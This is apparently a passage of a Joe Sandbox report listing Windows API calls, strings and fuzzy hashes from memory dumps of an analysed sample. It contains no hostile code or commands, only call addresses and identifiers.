                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 1306739567-0
                                                                                                            • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                            • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                            APIs
                                                                                                            • SetEndOfFile.KERNEL32(?,02087CA0,0040A08C,00000000), ref: 004076B3
                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 734332943-0
                                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                            • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                            • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                            • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                            • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                            • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                            • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                            APIs
                                                                                                            • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrev
                                                                                                            • String ID:
                                                                                                            • API String ID: 122130370-0
                                                                                                            • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                            • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                            • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                            • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                            • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                            • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                            • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                            • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                            • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                            • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                            • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                            • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                            • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                            • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                            • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 107509674-3733053543
                                                                                                            • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                            • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID:
                                                                                                            • API String ID: 3473537107-0
                                                                                                            • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                            • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                            • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                            • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                            • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                                            • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                                            • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                                            APIs
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: SystemTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 2656138-0
                                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889659487-0
                                                                                                            • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                            • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                            • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                            • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                            • API String ID: 4190037839-2401316094
                                                                                                            • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                            • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                            • String ID:
                                                                                                            • API String ID: 1694776339-0
                                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                            • LocalFree.KERNEL32(006EFC70,00000000,00401AB4), ref: 00401A1B
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006EFC70,00000000,00401AB4), ref: 00401A3A
                                                                                                            • LocalFree.KERNEL32(006EED20,?,00000000,00008000,006EFC70,00000000,00401AB4), ref: 00401A79
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                            • String ID: n
                                                                                                            • API String ID: 3782394904-3164384496
                                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                            APIs
                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                              • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                            • API String ID: 1044490935-665933166
                                                                                                            • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
